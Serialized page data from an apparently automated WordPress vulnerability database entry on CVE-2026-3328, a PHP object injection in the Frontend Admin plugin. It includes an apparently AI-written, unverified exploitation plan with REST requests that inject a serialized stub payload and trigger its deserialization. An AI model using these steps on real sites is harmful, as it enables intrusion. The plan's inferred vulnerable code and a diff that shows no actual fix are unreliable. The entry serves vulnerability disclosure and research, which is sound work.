[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJ3_fWdlEtOkh5NKj3gr4pn0mUe6fvu9XGayvlDdFF14":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-3328","frontend-admin-by-dynamiapps-authenticated-editor-php-object-injection-via-postcontent-of-admin-form-posts","Frontend Admin by DynamiApps \u003C= 3.28.31 - Authenticated (Editor+) PHP Object Injection via 'post_content' of Admin Form Posts","The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to PHP Object Injection via deserialization of the 'post_content' of admin_form posts in all versions up to, and including, 3.28.31. This is due to the use of WordPress's `maybe_unserialize()` function without class restrictions on user-controllable content stored in admin_form post content. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. The additional presence of a POP chain allows attackers to achieve remote code execution.","acf-frontend-form-element",null,"\u003C=3.28.31","3.28.32","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Deserialization of Untrusted Data","2026-03-25 14:11:27","2026-03-26 02:25:19",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0faa8f07-88c1-4638-9de5-e202807866e1?source=api-prod",1,[22,23,24,25,26],"acf-frontend.php","assets\u002Fbuild\u002Fadmin-form\u002Findex.asset.php","assets\u002Fbuild\u002Fadmin-form\u002Findex.js","assets\u002Fbuild\u002Fblocks\u002Fadmin-form\u002Fblock.json","assets\u002Fbuild\u002Fblocks\u002Fpayment-form\u002Fblock.json","researched",false,3,"This research plan targets a PHP Object Injection vulnerability in the **Frontend Admin by DynamiApps** plugin (\u003C= 3.28.31), where the plugin improperly uses `maybe_unserialize()` on the `post_content` of `admin_form` posts.\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** PHP Object Injection (Deserialization)\n*   **CPT Involved:** `admin_form` (Custom Post Type used by the plugin to store form configurations).\n*   **Vulnerable Sink:** `maybe_unserialize()` applied to the `post_content` of an `admin_form` post during form processing or rendering.\n*   **Root Cause:** The plugin stores form settings in the `post_content` field. When loading these settings, it retrieves the content and passes it to `maybe_unserialize()`. Since Editors (and above) can modify `admin_form` posts, they can inject a serialized PHP string that, when unserialized, instantiates arbitrary objects.\n*   **Severity:** High (7.2). Requires Editor+ level permissions.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** The standard WordPress REST API for posts (`\u002Fwp-json\u002Fwp\u002Fv2\u002Fadmin_form\u002F\u003Cid>`) or the Block Renderer API.\n*   **Vulnerable Parameter:** `post_content` (or `content` in REST API terms).\n*   **Authentication:** Authenticated (Editor or higher).\n*   **Preconditions:** The plugin must be active, and at least one `admin_form` post must exist (or the Editor must be able to create one).\n\n### 3. Code Flow\n1.  **Storage:** An Editor saves or updates an `admin_form` post. This can be done via the Gutenberg editor or a REST API request. The payload is stored in the `wp_posts` table under `post_content`.\n2.  **Retrieval:** When a page containing the `acf-frontend\u002Fform` block (defined in `assets\u002Fbuild\u002Fblocks\u002Fadmin-form\u002Fblock.json`) is loaded, the server-side rendering logic is triggered.\n3.  **Sink Path (Inferred):**\n    *   The `acf-frontend\u002Fform` block uses `ServerSideRender` (seen in `assets\u002Fbuild\u002Fadmin-form\u002Findex.js`).\n    *   The backend handler for this block likely calls `get_post($formID)`.\n    *   The code then performs `maybe_unserialize( $post->post_content )` to parse the form configuration.\n    *   If the `post_content` starts with `O:`, `a:`, etc., `maybe_unserialize` will execute PHP's `unserialize()`, triggering any `__wakeup` or `__destruct` methods in the injected object's class (or other magic methods if a POP chain is constructed).\n\n### 4. Nonce Acquisition Strategy\nSince the attack requires Editor privileges, we use the standard WordPress REST API nonce.\n1.  **Login:** Authenticate as an Editor.\n2.  **Navigation:** Navigate to the WordPress dashboard (`\u002Fwp-admin\u002F`).\n3.  **Extraction:** The REST API nonce is typically localized in the `wpApiSettings` JavaScript object.\n4.  **Action:** Use the `browser_eval` tool to extract the nonce:\n    ```javascript\n    browser_eval(\"window.wpApiSettings?.nonce\")\n    ```\n\n### 5. Exploitation Strategy\nThe goal is to update an `admin_form` post with a serialized payload and then trigger its deserialization.\n\n**Step 1: Identify or Create an `admin_form` post**\n*   Use the REST API to list existing forms:\n    `GET \u002Fwp-json\u002Fwp\u002Fv2\u002Fadmin_form` (Headers: `X-WP-Nonce: \u003CNONCE>`)\n*   If none exist, create one:\n    `POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fadmin_form`\n    Body: `{\"title\": \"Exploit Form\", \"status\": \"publish\"}`\n\n**Step 2: Inject the Serialized Payload**\n*   Update the `post_content` of the `admin_form` (assume ID is `123`).\n*   **Payload Example:** `O:8:\"WP_Query\":1:{s:5:\"query\";s:12:\"test_payload\";}` (This is a benign example; a real POP chain would target available classes like those in ACF or Freemius).\n*   **Request:**\n    ```http\n    POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fadmin_form\u002F123\n    Content-Type: application\u002Fjson\n    X-WP-Nonce: \u003CNONCE>\n\n    {\n      \"content\": \"O:8:\\\"WP_Query\\\":1:{s:5:\\\"query\\\";s:12:\\\"test_payload\\\";}\"\n    }\n    ```\n\n**Step 3: Trigger Deserialization**\n*   Trigger the Block Renderer for the `acf-frontend\u002Fform` block. This forces the server to process the form settings for the specified `formID`.\n*   **Request:**\n    ```http\n    GET \u002Fwp-json\u002Fwp\u002Fv2\u002Fblock-renderer\u002Facf-frontend\u002Fform?attributes[formID]=123&attributes[editMode]=true\n    X-WP-Nonce: \u003CNONCE>\n    ```\n\n### 6. Test Data Setup\n1.  **User:** Create a user with the `editor` role.\n2.  **Plugin:** Ensure \"Frontend Admin\" (acf-frontend-form-element) is installed and active.\n3.  **Form:** Use WP-CLI to quickly create an `admin_form` if needed:\n    ```bash\n    wp post create --post_type=admin_form --post_title=\"Vuln Post\" --post_status=publish\n    ```\n\n### 7. Expected Results\n*   **Success Criteria:** The server should attempt to unserialize the payload. If a valid POP chain is used, the side effects (e.g., file creation, remote request, or error logs) will be visible.\n*   **Response:** The `block-renderer` request will likely return a 200 OK or a 500 Internal Server Error if the POP chain causes a crash after execution.\n\n### 8. Verification Steps\n1.  **Verify Storage:** Check the database to confirm the serialized string is in `post_content`:\n    ```bash\n    wp db query \"SELECT post_content FROM wp_posts WHERE post_type='admin_form' AND ID=123\"\n    ```\n2.  **Monitor Logs:** Check `wp-content\u002Fdebug.log` for any \"Class not found\" errors or specific output from the POP chain.\n3.  **Confirm Execution:** If the POP chain is designed to create a file (e.g., `poc.php`), verify its existence:\n    ```bash\n    ls \u002Fvar\u002Fwww\u002Fhtml\u002Fpoc.php\n    ```\n\n### 9. Alternative Approaches\n*   **Shortcode Trigger:** If the REST Block Renderer is restricted, create a page with the shortcode: `[acf_frontend_form id=\"123\"]` and navigate to that page using the browser.\n*   **AJAX Save:** If the REST API for `admin_form` is disabled, the plugin likely has a custom AJAX handler for saving form settings. Check for `wp_ajax_save_form` or similar in the plugin's `main\u002F` directory.\n*   **Gutenberg Context:** Use `browser_navigate` to the `admin_form` edit page and use `browser_eval` to programmatically update the block content and click \"Update\".","The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to PHP Object Injection via the 'post_content' field of 'admin_form' posts. Authenticated attackers with Editor-level access or higher can inject serialized PHP objects into a form's configuration, which are then processed by WordPress's `maybe_unserialize()` function without restrictions when the form is rendered, potentially leading to remote code execution through a POP chain.","\u002F\u002F The exact PHP logic for the ServerSideRender handler was not provided in the source files,\n\u002F\u002F but the vulnerability resides in the retrieval and parsing of 'admin_form' post content.\n\u002F\u002F Inferred logic based on the research plan and vulnerability description:\n\n\u002F* \n * Path: [Inferred: main\u002Fplugin.php or block rendering logic]\n * Sink: maybe_unserialize() applied to user-controllable post_content\n *\u002F\n\n\u002F\u002F 1. Retrieve the form post\n$post = get_post($formID);\n\n\u002F\u002F 2. Vulnerable sink: Deserializing the post content which an Editor can modify\n$form_settings = maybe_unserialize( $post->post_content );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.30\u002Facf-frontend.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.32\u002Facf-frontend.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.30\u002Facf-frontend.php\t2026-03-01 15:32:14.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.32\u002Facf-frontend.php\t2026-03-22 07:43:14.000000000 +0000\n@@ -3,7 +3,7 @@\n  * Plugin Name: Frontend Admin\n  * Plugin URI:  https:\u002F\u002Fwww.dynamiapps.com\u002Ffrontend-admin\u002F\n  * Description: This awesome plugin allows you to easily display admin forms to the frontend of your site so your clients can easily edit content on their own from the frontend.\n- * Version:     3.28.30\n+ * Version:     3.28.32\n  * Author:      Shabti Kaplan\n  * Author URI:  https:\u002F\u002Fwww.dynamiapps.com\u002F\n  * Text Domain: frontend-admin\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.30\u002Fassets\u002Fbuild\u002Fadmin-form\u002Findex.asset.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.32\u002Fassets\u002Fbuild\u002Fadmin-form\u002Findex.asset.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.30\u002Fassets\u002Fbuild\u002Fadmin-form\u002Findex.asset.php\t2025-12-24 11:42:26.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Facf-frontend-form-element\u002F3.28.32\u002Fassets\u002Fbuild\u002Fadmin-form\u002Findex.asset.php\t2026-03-19 19:18:36.000000000 +0000\n@@ -1 +1 @@\n-\u003C?php return array('dependencies' => array('react', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-editor', 'wp-i18n'), 'version' => '8b7ba72674c9013748dd');\n+\u003C?php return array('dependencies' => array('react', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-editor', 'wp-i18n'), 'version' => '6c99b59cbc083ea3dc47');","1. Authentication: Log in to the WordPress site as a user with Editor privileges or higher to obtain a valid REST API nonce.\n2. Payload Preparation: Create a serialized PHP object payload designed to trigger a POP chain (e.g., using classes available in the environment like Freemius or ACF).\n3. Injection: Update an existing `admin_form` post (or create a new one) by sending a REST API request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fadmin_form\u002F\u003Cid>`. The payload should be placed in the `content` parameter.\n4. Execution: Trigger the deserialization of the injected object by invoking the block renderer for the specific form. This can be done via a request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fblock-renderer\u002Facf-frontend\u002Fform?attributes[formID]=\u003Cid>&attributes[editMode]=true`.","gemini-3-flash-preview","2026-04-17 22:50:46","2026-04-17 22:51:52",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","3.28.30","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags\u002F3.28.30","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-frontend-form-element.3.28.30.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags\u002F3.28.32","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Facf-frontend-form-element.3.28.32.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Facf-frontend-form-element\u002Ftags"]